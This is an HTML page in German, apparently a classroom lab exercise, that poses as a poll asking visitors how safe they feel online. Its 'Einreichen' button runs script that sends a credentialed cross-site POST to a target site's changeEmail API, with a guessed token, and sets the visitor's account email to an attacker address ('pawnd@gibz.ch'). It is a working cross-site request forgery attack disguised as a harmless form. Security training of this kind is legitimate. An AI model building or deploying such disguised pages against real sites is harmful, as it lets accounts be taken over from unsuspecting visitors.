<html>

<head>
    <link href="style.css" rel="stylesheet" type="text/css">
</head>

<body>
    <div>
        <h2>Wie Sicher fühlen Sie sich im Internet?</h2>
        <form>
            <select>
                <option>Sehr sicher</option>
                <option>Sicher</option>
                <option>So la la</option>
                <option>Unsicher</option>
                <option>Sehr unsicher</option>
            </select>
            <br />
            <br />
            <input type="button" value="Einreichen" onclick="send()"/>
        </form>
    </div>

    <script>
        function send(e) {
            req = new XMLHttpRequest();
            req.open("POST", "https://m183.gibz-informatik.ch/api/csrf/changeEmail");

            req.setRequestHeader("Content-Type", "application/json;charset=UTF-8")
            req.withCredentials = true;

            req.onreadystatechange = function (e) {
                if (this.readyState === 4) {
                    console.log(this.responseText);
                }
            }

            req.send(JSON.stringify({
                csrf: "BliBlaBlupSchwupDiDu",
                email: "pawnd@gibz.ch"
            }));

        }
    </script>
</body>

</html>